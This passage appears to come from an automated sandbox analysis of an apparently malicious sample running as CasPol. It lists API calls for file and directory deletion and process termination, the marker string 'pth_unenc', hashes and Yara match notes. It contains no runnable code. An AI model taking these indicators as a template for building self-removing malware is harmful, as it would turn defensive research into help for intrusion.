                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 3325800564-4028850238
                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                            APIs
                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 1872346434-4028850238
                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1717984340-0
                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759